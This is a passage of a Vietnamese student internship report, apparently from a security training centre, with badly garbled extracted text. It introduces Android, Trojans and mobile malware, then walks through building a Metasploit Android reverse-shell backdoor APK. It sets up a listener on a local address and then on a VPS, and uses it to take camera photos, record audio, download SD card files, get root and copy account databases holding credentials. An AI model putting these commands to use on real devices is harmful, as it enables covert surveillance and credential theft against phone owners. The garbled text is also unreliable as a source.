2. Tính ngang b ng c a các ng d ng. V i Android, không có s khác nhauằ ủ ứ ụ ớ ự gi a các ng d ng đi n tho i c b n v i ng d ng c a bên th ba. Chúngữ ứ ụ ệ ạ ơ ả ớ ứ ụ ủ ứ đ c xây d ng đ truy c p nh nhau t i m t lo t các ng d ng và d chượ ự ể ậ ư ớ ộ ạ ứ ụ ị v c a đi n tho i. V i các thi t b đ c xây d ng trên n n t ng Android,ụ ủ ệ ạ ớ ế ị ượ ự ề ả ng i dùng có th đáp ng đ y đ các nhu c u mà h thích. Chúng ta cóườ ể ứ ầ ủ ầ ọ th đ i màn hình n n, ki u g i đi n tho i, hay b t k ng d ng nào.ể ổ ề ể ọ ệ ạ ấ ể ứ ụ Chúng ta th m chí có th h ng d n đi n tho i ch xem nh ng nh mìnhậ ể ướ ẫ ệ ạ ỉ ữ ả thích.

3. Phá v rào c n phát tri n ng d ng. Android phá v rào c n đ t o ngỡ ả ể ứ ụ ỡ ả ể ạ ứ d ng m i và c i ti n. M t ng i phát tri n có th k t h p thông tin tụ ớ ả ế ộ ườ ể ể ế ợ ừ trang web v i d li u trên đi n tho i cá nhân – ch ng h n nh danh b ,ớ ữ ệ ệ ạ ẳ ạ ư ạ l ch hay v trí trên b n đ – đ cung c p chính xác h n cho ng i khác.ị ị ả ồ ể ấ ơ ườ V i Android, ng i phát tri n có th xây d ng m t ng d ng mà choớ ườ ể ể ự ộ ứ ụ phép ng i dùng xem v trí c a nh ng ng i b n và thông báo khi hườ ị ủ ữ ườ ạ ọ đang v trí lân c n. T t c đ c l p trình d dàng thông qua s h trở ị ậ ấ ả ượ ậ ễ ự ỗ ợ c a MapView và d ch v đ nh v toàn c u GPS. ủ ị ụ ị ị ầ

4. Xây d ng ng d ng d dàng và nhanh chóng. Android cung c p b thự ứ ụ ễ ấ ộ ư

vi n giao di n l p trình ng d ng đ s và các công c đ vi t các ngệ ệ ậ ứ ụ ồ ộ ụ ể ế ứ d ng ph c t p. Ví d , Android có th cho phép ng i phát tri n bi tụ ứ ạ ụ ể ườ ể ế đ c v trí c a thi t b và cho phép các thi t b giao ti p v i nhau đ cóượ ị ủ ế ị ế ị ế ớ ể th t o nên m ng xã h i chia s ngang hàng r ng kh p. Thêm n a,ể ạ ạ ộ ẻ ộ ắ ữ Android còn bao g m m t b công c đ y đ giúp cho vi c phát tri n trồ ộ ộ ụ ầ ủ ệ ể ở nên d dàng.ễ

2.1.4 Gi i thi u v Trojan:ớ ệ ề

Trojan - m t ch ng trình d ng virus, m t k làm n i gián trong máyộ ươ ạ ộ ẻ ộ tính c a b n đã giúp cho hacker đi u khi n máy tính c a b n, Trojan giúpủ ạ ề ể ủ ạ hacker l y nh ng thông tin quý báu c a b n, th m chí h n có th xóa ho cấ ữ ủ ạ ậ ắ ể ặ đ nh d ng l i c c ng c a b n n a. Trojan có th nhi m vào máy c a b nị ạ ạ ả ổ ứ ủ ạ ữ ể ễ ủ ạ qua t p tin g n kèm th đi n t mà b n đã vô tình t i v và ch y th , ho c cóậ ắ ư ệ ử ạ ả ề ạ ử ặ l n trong nh ng ch ng trình trò ch i, nh ng ch ng trình mà b n không rõẫ ữ ươ ơ ư ươ ạ ngu n g c...ồ ố Ð "moi ru t" đ c m t kh u c a các ch thuê bao, hacker n iể ộ ượ ậ ẩ ủ ủ ộ th ng s d ng virus có h Trojan g i đ n các thuê bao c n t n công thôngườ ử ụ ọ ử ế ầ ấ qua th đi n t (e-mail) d i d ng d li u đính kèm (File Attachment). Chư ệ ử ướ ạ ữ ệ ỉ c n khi các ch thuê bao vô tình m file này, l p t c Trojan đ c kích đ ng vàầ ủ ở ậ ứ ượ ộ t đ ng sao chép l i t t c các thông s v m t kh u c a ch thuê bao. Khôngự ộ ạ ấ ả ố ề ậ ẩ ủ ủ ch là m t kh u truy c p Intemet mà ngay c đ n m t kh u c a hòm th đi nỉ ậ ẩ ậ ả ế ậ ẩ ủ ư ệ t cũng d dàng b đánh c p. Ngay sau khi ch thuê bao k t n i Internet,ử ễ ị ắ ủ ế ố Trojan sẽ bí m t sinh ra m t e- mail và g i m t kh u đánh c p v cho "tinậ ộ ử ậ ẩ ắ ề t c". Và sau đó m i l n thay đ i m t kh u virus Trojan sẽ ti p t c l ng lẽặ ỗ ầ ổ ậ ẩ ế ụ ặ "tu n" c a ăn c p t i m t đ a ch mà hacker n i đã đ nh s n.ồ ủ ắ ớ ộ ị ỉ ộ ị ẵ

Ð đánh l a "n n nhân", "tin t c" luôn tìm cách giăng ra nh ng lo i b yể ừ ạ ặ ữ ạ ẫ h t s c tinh vi. Tinh vi đ n n i không ít ch thuê bao dù r t 'kỹ tính" nh ngế ứ ế ỗ ủ ấ ư

v n c "s p" b y nh th ng. Ph bi n nh t là hacker n i đ i l t nh ng tẫ ứ ậ ẫ ư ườ ổ ế ấ ộ ộ ố ữ ổ ch c hay công ty có uy tín đ đánh l a ch thuê bao b ng ch ng trình ph nứ ể ừ ủ ằ ươ ầ m m th ma Ghostmail. "tin t c" d dàng th o ra nh ng e-mail m o danh v iề ư ặ ễ ả ữ ạ ớ n i dung: "Hi n gi tình tr ng đánh c p m t kh u thuê bao đang r t phộ ệ ờ ạ ắ ậ ẩ ấ ổ bi n, nh m đ phòng tránh, chúng tôi xin đ c g i t i quý khách ch ngế ằ ể ượ ử ớ ươ trình ph n m m Tr-Protect (Vi rút Trojan sau khi đã đ i tên)". Có khi chúngầ ề ổ l i "đ i l t" chuyên gia l p trình ch ng trình di t virus s 1 Vi t Namạ ộ ố ậ ươ ệ ố ệ Nguy n T Qu ng: "Ð phòng ch ng virus Chernobyl 26- 4, chúng tôi hânễ ử ả ể ố h nh g i t i quý ngài ch ng trình BKAV 383. Mong quý v dùng th M i ýạ ở ớ ươ ị ử ọ ki n đóng góp xin g i v đ a ch sauế ử ề ị ỉ quangnt@it-hut.edu.vn". Khi nh n đ cậ ượ nh ng tin ki u nh v y, có không ít thuê bao d dàng "c n câu" và c "tữ ể ư ậ ễ ắ ứ ự nhiên" cho ch y ch ng trình vi rút Trojan mà không h nh n th c đ c r ngạ ươ ề ậ ứ ượ ằ h đang "t nguy n" hi n mình thành n n nhân c a b n "tin t c"ọ ự ệ ế ạ ủ ọ ặ .

Nh v y, khi Trojan đ c kích ho t trên máy c a b n và khi b n truy c pư ậ ượ ạ ủ ạ ạ ậ Internet thì Trojan có th l y m t kh u truy c p m ng, l y danh sách thể ấ ậ ẩ ậ ạ ấ ư đi n t và th m chí c c u hình máy tính c a b n đ g i cho m t đ a ch thệ ử ậ ả ấ ủ ạ ể ử ộ ị ỉ ư đi n t c a tên tin t c. Nh ng nguy hi m h n, Trojan còn g i c đ a ch m ngệ ử ủ ặ ư ể ơ ử ả ị ỉ ạ IP, là đ a ch mà nhà cung c p d ch v m ng (ISP) gán cho b n lúc truy c p;ị ỉ ấ ị ụ ạ ạ ậ tên tin t c sẽ s d ng đ a ch IP c a b n đ thi t l p k t n i t máy tính c aặ ử ụ ị ỉ ủ ạ ể ế ậ ế ố ừ ủ h n t i máy tính c a b n qua m ng Internet. Trojan sẽ l y thông tin, xóaắ ớ ủ ạ ạ ấ thông tin...

Các th đo n c a Hackerủ ạ ủ

1. Gi danh nhà cung c p d ch v : Hacker l y danh nghĩa nhà cung c pả ấ ị ụ ấ ấ d ch v Internet (ISP) g i đi n tho i ho c g i e-mail yêu c u b n cung c pị ụ ọ ệ ạ ặ ở ầ ạ ấ password ho c đ i password theo h g i ý. Hacker mail cho b n m t Attachedặ ổ ọ ợ ạ ộ File (t p tin .exe) cho bi t là file h tr s d ng Internet nh ng th c ch t đâyậ ế ỗ ợ ử ụ ư ự ấ là file ăn c p password.ắ

2. L i d ng s tin t ng khi m n ho c s a ch a máy tính c a b n h sẽợ ụ ự ưở ượ ặ ử ữ ủ ạ ọ d dàng l y m t kh u vì đa s ng i s d ng đ u th ng xuyên Saveễ ấ ậ ẩ ố ườ ử ụ ề ườ Password vào máy.

3. Cài "gián đi p" vào máy tính c a b n: Ðây là ph ng th c c đi nệ ủ ạ ươ ứ ổ ể nh ng l i là cách ăn c p password thông d ng và hi u qu nh t mà không t nư ạ ắ ụ ệ ả ấ ố công s c, th ng là file Horse Trojan đ c g i qua e-mail v i nh ng l i m iứ ườ ượ ở ớ ữ ờ ờ chào h t s c h p d n, kích thích tò mò. N u b n m file này thì ngay l p t cế ứ ấ ẫ ế ạ ở ậ ứ máy b n đã b nhi m virus và t đó tr đi, password c a b n đ c th ngạ ị ễ ừ ở ủ ạ ượ ườ xuyên g i v cho Hacker ngay c khi b n thay password m i.ở ề ả ạ ớ

Ð phòng, tìm và di t Trojan?ề ệ

Ð đ phòng b nhi m Trojan và các lo i virus, b n c n th n tr ng khi ể ề ị ễ ạ ạ ầ ậ ọt i các t p tin trên m ng.ả ậ ạ

Ð tìm và di t Trojan, b n c n ti n hành theo các b c sau:ể ệ ạ ầ ế ướ

1. Không nên t i và ch y th nh ng t p tin g n kèm th đi n t g i choả ạ ử ữ ậ ắ ư ệ ử ử b n t nh ng đ a ch th đi n t mà b n không rõ. Cũng vì lý do nàyạ ừ ữ ị ỉ ư ệ ử ạ mà tác gi c a ch ng trình di t vi rút thông d ng BKAV đã c nh báoả ủ ươ ệ ụ ả có nhi u k m o danh g i cho b n ch ng trình di t virus mà th cề ẻ ạ ử ạ ươ ệ ự ch t là Trojan.ấ

2. S d ng ch ng trình phát hi n và di t Trojan, b n có th tìm ki mử ụ ươ ệ ệ ạ ể ế trên m ng Internet v i t khóa "Detect and destroy Trojan"ạ ớ ừ .

3. N u b n không có s n trong tay nh ng ch ng trình phát hi n và di tế ạ ẵ ữ ươ ệ ệ Trojan thì b n có th ki m tra Registry c a Window: HKEY – LOCAL –ạ ể ể ủ MACHINE \ Software \ Microsoft \ Windows \ Current Version \ Run. N u th y có đ ng d n t i m t ch ng trình mà b n bi t là khôngế ấ ườ ẫ ớ ộ ươ ạ ế ph i c a Window ho c c a các ch ng trình ti n ích, b n hãy thoátả ủ ặ ủ ươ ệ ạ Window v ch đ DOS và xóa t p tin theo đ ng d n c a Registry,ề ế ộ ậ ườ ẫ ủ vào l i Window và xóa dòng đã ghi trong Registry. B n cũng có thạ ạ ể ki m tra c t p tin Win.ini, System.ini trong th m c C:\Windows sauể ả ậ ư ụ m c Run ho c Load.ụ ặ

2.1.5 Gi i thi u v Malware:ớ ệ ề

Malware (ph n m m ác tính) vi t t t c a c m t Malicious Sofware, làầ ề ế ắ ủ ụ ừ m t ph n m m máy tính đ c thi t k v i m c đích thâm nh p ho c gâyộ ầ ề ượ ế ế ớ ụ ậ ặ h ng hóc máy tính mà ng i s d ng không h hay bi t. ỏ ườ ử ụ ề ế

Theo th ng kê c a các hãng b o m t trên th gi i thì hi n các Malwareố ủ ả ậ ế ớ ệ hi n nay m i ch d ng l i m c đ xâm nh p và ăn c p thông tin c a ng iệ ớ ỉ ừ ạ ở ứ ộ ậ ắ ủ ườ dùng và nó ch a có c ch lây lan. Theo các k t qu trên thì Malware trênư ơ ế ế ả Smartphone hi n nay v cách th c ho t đ ng gi ng nh m t ph n m m giánệ ề ứ ạ ộ ố ư ộ ầ ề đi p (Trojan) h n là m t virus phá h y. ệ ơ ộ ủ

C ch ho t đ ng c a Malwareơ ế ạ ộ ủ

Malware này ho t đ ng qua hai giai đo n: ạ ộ ạ

- Giai đo n đ u: Malware đ c nhúng vào trong m t ng d ng và sẽạ ầ ượ ộ ứ ụ chi m đ c quy n root vào thi t b c a b n ngay sau khi b n ch y ng d ngế ượ ề ế ị ủ ạ ạ ạ ứ ụ đó trong l n s d ng đ u tiên. ầ ử ụ ầ

- Giai đo n 2: Malware t đ ng cài đ t m t ng d ng th 2 v i m tạ ự ộ ặ ộ ứ ụ ứ ớ ộ permission đ c bi t cho phép quy n uninstall. M t khi các ng d ng th 2ặ ệ ề ộ ứ ụ ứ đ c cài đ t, nó có th g i các thông tin nh y c m t i m t máy ch t xa vàượ ặ ể ử ạ ả ớ ộ ủ ừ âm th m t i thêm các ng d ng khác. Vi c cài đ t ng d ng h th ng nàyầ ả ứ ụ ệ ặ ứ ụ ệ ố nh m ngăn ng a ng i dùng xem ho c g b cài đ t các ng d ng mà khôngằ ừ ườ ặ ỡ ỏ ặ ứ ụ đ c phép. ượ

Không gi ng nh giai đo n đ u, ng i dùng ph i kh i đ ng ng d ng đố ư ạ ầ ườ ả ở ộ ứ ụ ể b t đ u vi c lây nhi m. giai đo n th hai ng d ng t đ ng làm m t sắ ầ ệ ễ Ở ạ ứ ứ ụ ự ộ ộ ố vi c nh là confirm, check-in. M t đi u n a khi n cho b n không th bi tệ ư ộ ề ữ ế ạ ể ế chúng ho t đ ng lúc nào (h u h t vào kho ng th i gian t 11h đêm t i 8hạ ộ ầ ế ả ờ ừ ớ sáng ngày hôm sau). Đây là kho ng th i gian mà đi n tho i ít có kh năngả ờ ệ ạ ả đ c s d ng nh t. Đi u này làm cho ng i dùng khó khăn h n trong vi cượ ử ụ ấ ề ườ ơ ệ phát hi n m t hành vi b t th ng trên chi c smartphone c a mình. ệ ộ ấ ườ ế ủ

M c đích c a Malwareụ ủ

M c đích c a Malware m i ch d ng l i m c đ làm cho chi c đi nụ ủ ớ ỉ ừ ạ ở ứ ộ ế ệ tho i c a ng i dùng t đ ng cài đ t nh ng ng d ng ch a mã đ c khác. Tuyạ ủ ườ ự ộ ặ ữ ứ ụ ứ ộ nhiên các bi n th v sau đã k p th i bi n đ i đ gây ra các m i nguy h i l nế ể ề ị ờ ế ổ ể ố ạ ớ h n r t nhi u. Ví d nh Hippo SMS đ c tìm th y m i đây có kh năng tơ ấ ề ụ ư ượ ấ ớ ả ự g i tin nh n mà không c n s cho phép c a ng i dùng, vi c này sẽ khi nử ắ ầ ự ủ ườ ệ ế ti n c c phí c a ng i dùng tăng lên m t cách chóng m t mà ng i dùngề ướ ủ ườ ộ ặ ườ không bi t rõ lí do t i sao. Ho c m t Malware khác là Zitmo, Malware này đ aế ạ ặ ộ ư

ra các ng d ng kích ho t m i hành đ ng liên quan đ n d ch v ngân hàng,ứ ụ ạ ọ ộ ế ị ụ ti p nh n SMS g i đ n và chuy n t i máy ch . Các đo n code dùng 1 l n màế ậ ử ế ể ớ ủ ạ ầ các ngân hàng th ng g i t i khách hàng thông qua tin nh n SMS đ ch ngườ ử ớ ắ ể ứ th c sẽ b thu th p b i các malware này. ự ị ậ ở

Hi n nay còn có m t s Malware còn có kh năng nghe lén t t c cácệ ộ ố ả ấ ả cu c đi n tho i. V n đ này th c s nguy hi m khi t t c các v n đ riêng tộ ệ ạ ấ ề ự ự ể ấ ả ấ ề ư c a chúng ta đang b m t theo dõi, vì v y nh ng m i nguy hi m t mã đ củ ị ộ ậ ữ ố ể ừ ộ trên Android đang th c s đe d a đ n an s an toàn c a ng i dùng h đi uự ự ọ ế ự ủ ườ ệ ề hành này.

2.1.6 Sinh mã đ c trên Kali Linux:ộ

Ta s d ng Metasploit framework trên Kali Linux đ t o m tử ụ ể ạ ộ payload, khi máy android t i v và m payload lên thì sẽ b xâm nh p vàả ề ở ị ậ đi u khi n. N u s d ng máy o Kali Linux b ng VMware, ta nên thi tề ể ế ử ụ ả ằ ế l p ph n Network nh sau:ậ ầ ư

B m vào ấ VM -> Settings... thanh l a ch n c a VMwareở ự ọ ủ

Hình 2.1.24 Setting network VMware (Step 1)

B m vào ấ Network Adapter và ch n ọ Bridged: connection directly to the physical network

B m vào ấ Edit -> Virtual Network Editor...

Trên ph n ầ Bridge (connect VMs directly to the external network) ch n adapter c a máy th tọ ủ ậ

Sau đây ta vào ph n chính t o backdoor và xâm nh p đi u khi n androidầ ạ ậ ề ể

Đ u tiên m terminal và gõ dòng l nhầ ở ệ

msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk

192.168.0.104 là đ a ch IP c a máy Kali, ta có th s d ng l nh ị ỉ ủ ể ử ụ ệ ifconfig đ xem IP c a máy Kaliể ủ

8080 là s port, có th ch n port khác, không nên ch n các port th ngố ể ọ ọ ườ s d ng ử ụ

L nh trên sẽ t o ra 1 file ệ ạ files.apk trên desktop c a Kali, đây chính là m tủ ộ Metasploit reverse tcp backdoor.

Ti p theo, gõ l nh ế ệ msfconsole

Sau khi msfconsile load xong, ta t o m t handler đ x líạ ộ ể ử d li u truy nữ ệ ề về b ng cách gõ l nh sau:ằ ệ

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.104 – [nh p đ a ch IP gi ng v i khi t o payload ậ ị ỉ ố ớ ạ ở trên].

set lport 8080 – [nh p port gi ng v i port khi t o payload trênậ ố ớ ạ ở ].

Exploit

Màn hình sẽ nh sau, lúc này ta đang ch m t máy android m backdoor.ư ờ ộ ở

2.1.7 Đ a mã đ c vào thi t b Android:ư ộ ế ị

Vì không có máy Android th t nên mình test ậ th v i m t máy Galaxyử ớ ộ Nexus gi l pả ậ b ng ph n m m GennyMotion (đăng ký m t tài kho n vàằ ầ ề ộ ả donwload t i ạ https://cloud.genymotion.com/page/launchpad/download/), t i v ả ề files.apk, cài đ t và m lên đ c giao di n nh d i, nh p vào nútặ ở ượ ệ ư ướ ấ “ReverseTCP”:

V y là ta đã k t n i thành công t i máy Android này, ậ ế ố ớ ở msfconsole sẽ nh sau:ư

S d ng camera:ử ụ

Đ xem danh sách camera, nh p ể ậ webcam_list

Đ ch p hình b ng camera, nh p webcam_snap x v i x là id c a camera ể ụ ằ ậ ớ ủxem danh sách camera ph n tr c. Ví d nh sau:ở ở ầ ướ ụ ư

File hình đã ch p t camera c a máy android là ụ ừ ủ FrumITki.jpeg đ c l uượ ư ở /root c a máy.ủ

Ghi âm

Đ th c hi n ghi âm, nh p l nh ể ự ệ ậ ệ record_mic và file ghi âm sẽ đ c l u vượ ư ề máy

2.1.8 Xâm nh p SD card c a thi t b Android t Kali Linux:ậ ủ ế ị ừ

Đ vào sdcard, nh p l nh: ể ậ ệ cd /sdcard và l nh ệ ls đ xem danh sách file, ểth m cư ụ

Ví d đây, ta t i file ụ ở ả App.apk trong th m c download c a sdcardư ụ ủ

Dùng l nh ệ cd /sdcard/Download đ vào th m cể ư ụ

Nh trên hình, ta th y 1 file là App.apk, đ t i v máy, ta nh p l như ấ ể ả ề ậ ệ

Download App.apk

Và file này sẽ đ c t i v th m c ượ ả ề ư ụ /root c a máy Kaliủ

2.1.9 K t lu n:ế ậ

Nh v y, ta đã tìm hi u v Kali Linux, cách s d ng Metasploit c a Kaliư ậ ể ề ử ụ ủ Linux đ xâm nh p và đi u khi n, truy n d li u t máy android v máy.ể ậ ề ể ề ữ ệ ừ ề

Sau khi th nghi m cách t n công này, ta rút ra k t lu n: không nên t iử ệ ấ ế ậ ả v và ch y file l trên máy android đ b o đ m không cài nh m backdoorề ạ ạ ể ả ả ầ nh đã th y trên, ch c n máy b nhi m backdoor là ta đã có th xem nh cóư ấ ở ỉ ầ ị ễ ể ư toàn quy n ki m soát máy android đó.ề ể

2.2 Làm trên VPS

2.2.1 Gi i thi u v VPS:ớ ệ ề

Đ nh nghĩaị

Máy ch o (Virtual Private Server -VPS) là ph ng pháp phân chia m tủ ả ươ ộ máy ch v t lý thành nhi u máy ch o. Trong khi trên m t server ch y m tủ ậ ề ủ ả ộ ạ ộ

Share Host thì có th có hàng trăm tài kho n ch y cùng lúc, nh ng trên serverể ả ạ ư ch y VPS thì con s này ch b ng 1/10. Do v y, VPS có hi u năng cao h nạ ố ỉ ằ ậ ệ ơ Share Host r t nhi u.ấ ề

M i máy ch là m t h th ng hoàn toàn riêng bi t, có h đi u hành riêng,ỗ ủ ộ ệ ố ệ ệ ề có toàn quy n qu n lý root và có th restart l i h th ng b t c lúc nào. Doề ả ể ạ ệ ố ấ ứ v y, VPS h n ch 100% kh năng b hack local.ậ ạ ế ả ị

Trên 1 server ch y Share Host có nhi u Website ch y chung v i nhau,ạ ề ạ ớ chung tài nguyên server, n u 1 Website b t n công Ddos, botnet quá m nh sẽế ị ấ ạ làm nh h ng đ n các Website khác cùng server, riêng server VPS, m t tàiả ưở ế ộ kho n trên VPS b t n công thì m i tài kho n khác trên VPS đ u ho t đ ngả ị ấ ọ ả ề ạ ộ bình th ng.ườ

VPS dành cho các doanh nghi p v a và nh ng trang Web l n ho c mãệ ừ ữ ớ ặ ngu n n ng, n u ch y trên Share Host sẽ không đáp ng đ yêu c u.Tuyồ ặ ế ạ ứ ủ ầ nhiên, VPS đòi h i ng i s d ng ph i có thêm m t s ki n th c v b o m t,ỏ ườ ử ụ ả ộ ố ế ứ ề ả ậ c u hình server,….ấ

Đ c đi m v thông s VPSặ ể ề ố

Ho t đ ng hoàn toàn nh m t server riêng nên s h u m t ph n CPUạ ộ ư ộ ở ữ ộ ầ riêng, dung l ng RAM riêng, dung l ng HDD riêng, đ a ch IP riêng và hượ ượ ổ ị ỉ ệ đi u hành riêng.ề

Ti t ki m đ c nhi u chi phí so v i vi c thuê m t server riêng.ế ệ ượ ề ớ ệ ộ

Ngoài vi c dùng VPS đ thi t l p Web Server, Mail Server cũng nh cácệ ể ế ậ ư ng d ng khác thì có th cài đ t đ th c hi n nh ng yêu c u riêng nh truyứ ụ ể ặ ể ự ệ ữ ầ ư

c p Web b ng trình duy t Web trên VPS, dowload/upload bittorrent v i t cậ ằ ệ ớ ố đ cao…ộ

Trong tr ng h p VPS b thi u tài nguyên thì có th d dàng nâng c p tàiườ ợ ị ế ể ễ ấ nguyên mà không c n ph i kh i đ ng l i h th ng.ầ ả ở ộ ạ ệ ố

Có th cài l i h đi u hành v i th i gian t 5-10 phút.ể ạ ệ ề ớ ờ ừ

Giá tr khi s d ng VPSị ử ụ

Server m nh v i nhi u c u hình cho phép khách hàng d dàng l a ch nạ ớ ề ấ ễ ự ọ gói VPS phù h p.ợ

Mi n phí chi phí cài đ t ban đ u cũng nh c u hình ho t đ ng cho khácễ ặ ầ ư ấ ạ ộ hàng.

H tr khác hàng cài đ t mi n phí thêm các ph n m m riêng.ỗ ợ ặ ễ ầ ề

Đ c c u hình và cài đ t h th ng Firewall và DDOS Protection.ượ ấ ặ ệ ố

B ph n kỹ thu t k p th i can thi p nhanh chóng n u có s c phát sinh.ộ ậ ậ ị ờ ệ ế ự ố

2.2.2 Cài đ t mã đ c trên VPS:ặ ộ

Gi i thi u ớ ệ

Metasploit là m t công c khai thác l h ng c a các h đi u hành, dùngộ ụ ỗ ổ ủ ệ ề đ ki m tra, t n công và khai thác l i c a các service. Metasploit đ c xâyể ể ấ ỗ ủ ượ d ng t ngôn ng h ng đ i t ng Perl, v i nh ng components đ c vi tự ừ ữ ướ ố ượ ớ ữ ượ ế b ng C, assembler, và Python. Metasploit có th ch y trên h u h t các h đi uằ ể ạ ầ ế ệ ề hành: Linux, Windows, Mac OS.

Cài đ t ặ

T i gói cài đ t c a Metasploit, đây ta có 2 phiên b n là Pro vàả ặ ủ ở ả

Community. Ta ch n phiên b n Community mi n phí và dùng cho nghiên c u. ọ ả ễ ứ

Sau khi t i v gói cài đ t c a Metasploit Community ta cài đ t nh nh ngả ề ặ ủ ặ ư ữ ph n m m khác. ầ ề

Ch n folder cài đ t: ọ ặ

C ng c a d ch v Metasploit sẽ s d ng, m c đ nh là 3790: ổ ủ ị ụ ử ụ ặ ị

Ch n server và ngày h t h n, đ m c đ nh: ọ ế ạ ể ặ ị

Quá trình cài đ t c a Metasploit: ặ ủ

Ti n trình hoàn t t, ch n Finish và truy c p đ n giao di n web c a ế ấ ọ ậ ế ệ ủch ng trình: ươ

Sau khi Finish trình duy t web m lên và đi t i giao di nệ ở ớ ệ

Click vào link: https://localhost:3790/ sẽ d n đ n trang t o tài kho n đ ẫ ế ạ ả ểlogin vào Metasploit. Đi n Username, Password s d ng và m t s thông tin b xung, ề ử ụ ộ ố ổr i ch n Create Account: ồ ọ

Trình duy t chuy n đ n trang nh p key đ active ch ng trình, key này ệ ể ế ậ ể ươđ c g i mi n phí đ n mail khi t i ph n m m. Sau khi đi n key nh n ượ ử ễ ế ả ầ ề ề ấActivate License:

Giao di n ch ng trình Metasploit Console ệ ươ

2.2.3 T VPS xâm nh p vào thi t b Android:ừ ậ ế ị

Các b c th c hi nướ ự ệ

1. S d ng Kali Linux đ t o file APK làm backdoor đ hack vàoử ụ ể ạ ể

Android nh trên mang LAN v i đ a ch IP là đ a ch c a VPS ư ớ ị ỉ ị ỉ ủ

Chúng ta v n s d ng l nh ẫ ử ụ ệ

msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132

lport=4444 R > /root/Desktop/files.apk

đây đ a ch VPS là 14.0.21.132Ở ị ỉ

2. Kh i đ ng Metasploit Console trên VPSở ộ

3. Chúng ta th c hi n các b c xâm nh p nh đã đ c p ph n trên,ự ệ ướ ậ ư ề ậ ở ầ

đây ch khác là s d ng chính IP c a VPSở ỉ ử ụ ủ

4. Sau khi máy n n nhân t i v file apk đã đ c t o ra, máy androidạ ả ề ượ ạ đó sẽ b hackị

5. S d ng l nh Help đ xem các l nh đ c metasploit h trử ụ ệ ể ệ ượ ỗ ợ

Đ xem thông tin v máy, nh p l nh ể ề ậ ệ sysinfoĐ xem các tác v đang ch y gõ ể ụ ạ psXem ip gõ ifconfigXem danh sách th m c, file gõ ư ụ ls

S d ng camera:ử ụĐ xem danh sách camera, nh p ể ậ webcam_listĐ ch p hình b ng camera, nh p ể ụ ằ ậ webcam_snap x v i x là id c a camera ớ ủ

xem danh sách camera ph n tr c. ở ở ầ ướ

Ghi âmĐ th c hi n ghi âm, nh p lênh ể ự ệ ậ record_mic và file ghi âm sẽ đ c l u vượ ư ề

L y file t sd cardấ ừĐ vào sdcard, nh p l nh: cd /sdcard và l nh ls đ xem danh sách file, ể ậ ệ ệ ể

th m cư ụDùng l nh cd /sdcard/Download đ vào th m cệ ể ư ụ

Đ t i v máy, ta nh p l nhể ả ề ậ ệDownload App.apk

Đ upload gõ l nh ể ệ uploadVà file này sẽ đ c t i v th m c root c a máy Kaliượ ả ề ư ụ ủ

Gõ shell đ vào l nhể ệki m tra xem có root ch a gõể ưsuwhoamiN u báo unknown id is 0 t c là đã rootế ứls -l danh m c file và các quy nụ ềcd đ chuy n h ng th m cể ể ướ ư ụĐ ăn c p tài kho n, m t kh u, file apk và thay đ i các quy n ể ắ ả ậ ẩ ổ ề/DATA/DATA/APP/DATA/SYSTEM/DATA/SYSTEM/accounts.db/DATA/SYSTEM/SYNC/accounts.xml/SYSTEM/APP/đ xem danh sách và down load các file hay thay đ i các file trong ROMể ổđ u tiên ph i gõ l nh SU đ có toàn quy n truy c pầ ả ệ ể ề ậđ có đ ng d n đ y đ dùng l nh chmod -R 777 path to filenameể ườ ẫ ầ ủ ệVí d chmod -R 777 /dataụCtrl + C đ quay l iể ạS d ng SQLite đ m file dbử ụ ể ở

3 K T QU Đ T Đ CẾ Ả Ạ ƯỢ

Nh ng ki n th c lý thuy t đã đ c c ng c :ữ ế ứ ế ượ ủ ố

Tìm hi u v l ch s , quá trình phát tri n c a h đi u hành ể ề ị ử ể ủ ệ ềAndroid

Tìm hi u v h đi u hành Kali Linuxể ề ệ ề Tìm hi u v các l h ng b o m t c a Windows và Androidể ề ỗ ổ ả ậ ủ Tìm hi u v cách s a đ i file APK và th c hi n Signing ng d ngể ề ử ổ ự ệ ứ ụ

Nh ng kỹ năng th c hành đã đ c h c thêm:ữ ự ượ ọ

Th c hi n cài đ t Android trên máy oự ệ ặ ả Cài đ t Kali Linux, s d ng nó đ hack vào các l h ng b o m t ặ ử ụ ể ỗ ổ ả ậ

c a Windows và Androidủ Thi l y ch ng ch System Hacking c a trung tâm Athenaấ ứ ỉ ủ Th c hi n s a đ i, t o ra các file Trojan, Backdoor sau đó cài đ t ự ệ ử ổ ạ ặ

vào Android Bi t thêm v m t s bài h c trong l p Hacker mũ tr ngế ề ộ ố ọ ớ ắ

Nh ng kinh nghi m th c ti n đã tích lũy đ c:ữ ệ ự ễ ượ

Qua g n 2 tháng th c t p, b n thân em đã đúc k t đ c nhi u kinh ầ ự ậ ả ế ượ ềnghi m quý báu, th nh t đó là các kĩ năng v chuyên môn, em đã đ c h c ệ ứ ấ ề ượ ọvà cũng c các ki n th c m i bên c nh các ki n th c n n t ng. H n đó n a là ố ế ứ ớ ạ ế ứ ề ả ơ ữquá trình th c t p trong môi tr ng doanh nghi p đã cho em làm quen d n ự ậ ườ ệ ầđ không b ng trong quá trình đi làm sau này, thông qua các kĩ năng giao ể ỡ ỡti p và ng x . ế ứ ử

4 K T LU N QUÁ TRÌNH TH C T PẾ Ậ Ự Ậ

....................................................................................................................................

Báo cáo cuối kỳ ATHENA 31/07/2014

Technology

Chuỗi Cung Ứng Cuối Kỳ

Con Kỳ Lân Cuối Cùng - doanquocsy.com

Báo cáo thực tập cuối kỳ

BT CoLyThuyet - Cuối Kỳ

BẢNG ĐIỂM THI:……CUỐI KỲ………

Báo cáo cuối kỳ athena

Báo cáo cuối kỳ thực tập - Trung tâm Athena

BÁO CÁO THỰC TẬP - CUỐI KỲ

bao cáo cuối kỳ

Đề thi cuối kỳ PLĐC

Báo Cáo Cuối kỳ CNTT ATHENA

[Nguyen Minh Tri] Báo cáo cuối kỳ Athena - NGHIÊN CỨU VÀ XÂY DỰNG WEB BẰNG WORDPRESS

Báo cáo cuối kỳ Athena - Lê Nguyễn Vĩnh

Báo cáo cuối kỳ - thực tập Athena

Báo cáo cuối kỳ Athena - Report

Báo Cáo Cuối Kỳ

Báo cáo thực tập Athena cuối kỳ - Nguyễn Văn Hưng

ÔN TẬP CUỐI KỲ

ôn tập cuối kỳ HĐH

Báo cáo cuối kỳ athena backtrack và các công cụ kiểm tra an ninh mạng